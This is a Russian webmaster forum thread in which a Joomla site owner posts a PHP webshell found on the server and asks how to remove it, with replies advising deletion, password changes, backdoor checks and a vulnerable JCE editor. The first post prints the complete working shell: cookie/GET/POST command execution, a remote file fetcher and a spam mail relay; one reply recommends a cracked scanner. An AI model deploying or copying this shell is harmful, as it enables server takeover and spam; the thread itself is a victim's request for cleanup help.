X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Joomla- залили шелл, помогите почистить
frion-seo
frion-seo
Topic Starter сообщение 10.6.2014, 12:04; Ответить: frion-seo
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 747
Регистрация: 16.9.2010
Поблагодарили: 181 раз
Репутация:   68  


Привет ! Вот код этой гадости, которую нашел в папке administrator :
Код
<?php

/// WebShell

$n='XERATUTA';
$c=$_COOKIE[$n];
if(@empty($c)){$c=$_POST[$n];}
if(@empty($c)){$c=$_GET[$n];}
if(@get_magic_quotes_gpc()){$c=stripslashes($c);}
if ($c) {
//curl -v --cookie "XERATUTA=w" URL
//adjust system variables
if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}
//die with error
function x_die($m){@header('HTTP/1.1 500 '.$m);@die();}
//check if we can exec
define('has_passthru',@function_exists('passthru'));
define('has_system',@function_exists('system'));
define('has_shell_exec',@function_exists('shell_exec'));
define('has_popen',@function_exists('popen'));
define('has_proc_open',@function_exists('proc_open'));
define('has_exec',@function_exists('exec'));
define('can_exec',(has_passthru||has_system||has_shell_exec||has_popen||has_proc_open||has_exec));
if(!can_exec){x_die('can not exec: no functions available');}
//check if we can config
define('has_ini_get',@function_exists('ini_get'));
define('has_ini_get_all',@function_exists('ini_get_all'));
define('can_config',(has_ini_get||has_ini_get_all));
if(!can_config){x_die('can not config');}
//get config value
function x_ini_get($n){if(has_ini_get){return(@ini_get($n));}elseif(has_ini_get_all){$h=@ini_get_all();return($h[$n]['local_value']);}}
// check safe mode
if(x_ini_get('safe_mode')){x_die('can not exec: safe mode active');}
//smart exec helpers
function x_passthru($c){@passthru($c);}
function x_system($c){@system($c);}
function x_shell_exec($c){echo @shell_exec($c);}
function x_popen($c){$o;if(($f=@popen($c,'r'))){while(!@feof($f)){$o.=@fgets($f);}@pclose($f);}echo $o;}
function x_proc_open($c){$o;if(@is_resource($p=@proc_open($c,array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')),$f))){@fclose($f[0]);while(!@feof($f[1])){$o.=@fgets($f[1]);}@fclose($f[1]);@proc_close($p);}echo $o;}
function x_exec($c){$o;@exec($c,$o);echo @implode("\n",$o);}
//do smart fetch
function x_superfetch($a,$p,$r,$l)
{
        if($s=@fsockopen($a,$p))
        {
                if($f=@fopen($l,"wb"))
                {
                        @fwrite($s,"GET ".$r." HTTP/1.0\r\n\r\n");
                        while(!@feof($s))
                        {
                                $b=@fread($s,8192);
                                @fwrite($f,$b);
                        }
                        @fclose($f);
                        echo "OK\n";
                }
                @fclose($s);
        }
}
//do smart exec
function x_smart_exec($c)
{
        if($c==="which superfetch 1> /dev/null 2> /dev/null && echo OK")
        {
                echo "OK\n";
        }
        elseif(@strstr($c,"superfetch"))
        {
                $a=@explode(' ',$c);
                x_superfetch($a[1],$a[2],$a[3],$a[4]);
        }
        elseif(has_passthru){x_passthru($c);}
        elseif(has_system){x_system($c);}
        elseif(has_shell_exec){x_shell_exec($c);}
        elseif(has_popen){x_popen($c);}
        elseif(has_proc_open){x_proc_open($c);}
        elseif(has_exec){x_exec($c);}
}
//go
$n='XERATUTA';
$c=$_COOKIE[$n];
if(@empty($c)){$c=$_POST[$n];}
if(@empty($c)){$c=$_GET[$n];}
if(@get_magic_quotes_gpc()){$c=stripslashes($c);}
if ($c) x_smart_exec($c);


} else {

//########## AMS ############

if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
        {
        echo "indata_error";
        exit;
        }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader)) {
        echo "sent_ok";
}
else {
        echo "sent_error";
}

}
?>

Кто встречал такую заразу ? Как лечиться ( просто удалить файл ?)?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 10.6.2014, 12:19; Ответить: mmkulikov
Сообщение #2


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


Цитата(frion-seo @ 10.6.2014, 10:04) *
Как лечиться ( просто удалить файл ?)?

Просто удалить и сменить пароли. Посмотреть остальные скрипты. Прогнать антивирусом для сайта.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
frion-seo
frion-seo
Topic Starter сообщение 10.6.2014, 12:40; Ответить: frion-seo
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 747
Регистрация: 16.9.2010
Поблагодарили: 181 раз
Репутация:   68  


файл удалил, все внешние ссылки остались...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SergSob14
SergSob14
сообщение 10.6.2014, 13:17; Ответить: SergSob14
Сообщение #4


Новичок
*


Группа: User
Сообщений: 21
Регистрация: 2.6.2014
Поблагодарили: 6 раз
Репутация:   0  


Пароль на админке простой был типа 12345?
Если да - у Вас просто сбрутили пароль от админки, смените пароль, потрите шелл, проверьте наличие шелов в других местах самомтоятельно или фоспользуйтесь услугами специалиста (скорее всего залили не 1 шелл + пару бекдоров для подстраховки).
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
frion-seo
frion-seo
Topic Starter сообщение 10.6.2014, 13:29; Ответить: frion-seo
Сообщение #5


Завсегдатай
*****

Группа: Active User
Сообщений: 747
Регистрация: 16.9.2010
Поблагодарили: 181 раз
Репутация:   68  


Спецы! Помогите почистить сайт ! Оплачу


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 10.6.2014, 13:32; Ответить: mmkulikov
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


frion-seo, Контакты в подписи и профиле.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 10.6.2014, 13:49; Ответить: seomasters
Сообщение #7


клоновод
*****

Группа: Banned
Сообщений: 701
Регистрация: 22.9.2011
Из: Россия, Крым
Поблагодарили: 245 раз
Репутация:   62  


Готов посмотреть!


--------------------
клоновод


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 10.6.2014, 14:29; Ответить: Rxp
Сообщение #8


Участник
***


Группа: User
Сообщений: 115
Регистрация: 9.11.2008
Поблагодарили: 21 раз
Репутация:   10  


ТС если необходима профиссиональная помощь стучите, контакты в профиле


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Tollun
Tollun
сообщение 10.6.2014, 16:29; Ответить: Tollun
Сообщение #9


Старожил
******

Группа: Active User
Сообщений: 1595
Регистрация: 1.10.2009
Из: Хабаровск
Поблагодарили: 394 раза
Репутация:   66  


Если визуальный редактор jce версии 2.1.1 и ниже, то залили через дырку в нём и пароль не причём, да и удаление не на долго поможет.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SmsMore
SmsMore
сообщение 11.6.2014, 10:58; Ответить: SmsMore
Сообщение #10


Новичок
*


Группа: User
Сообщений: 22
Регистрация: 10.6.2014
Поблагодарили: 2 раза
Репутация:   0  


Попробуй просканировать сайт на уязвимости программой Acunetix Web Vulnerability Scanner 8 найди на торрентах с таблеткой, он поможет найти уязвимости, уже вроде и 9-я версия есть.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
142 contex1 64948 5.12.2017, 12:13
автор: contex1
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
10 Nell 1013 29.11.2017, 19:56
автор: vladimir47
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСоздание недорогих сайтов под ключ на CMS Joomla!
Качественное и недорогое создание сайтов на CMS Joomla
111 LoraDi 43319 23.11.2017, 6:15
автор: igorm54
Открытая тема (нет новых ответов) Услуги по созданию/доработки/правки сайтов на CMS DLE (Datalife Engine), Wordpress, Joomla
Качественно и по Низким ценам!!!!
2 Webfrilanser 675 20.11.2017, 7:05
автор: Webfrilanser
Открытая тема (нет новых ответов) Качественная верстка Ваших проектов + работа с Wordpress, Joomla (Первым двум заказчикам скидка 50%).
Верстка,правка косяков/багов + другая работа. Доступные цены.
11 Fortunatus 2356 19.11.2017, 22:34
автор: Fortunatus


 



RSS Текстовая версия Сейчас: 11.12.2017, 11:50
Дизайн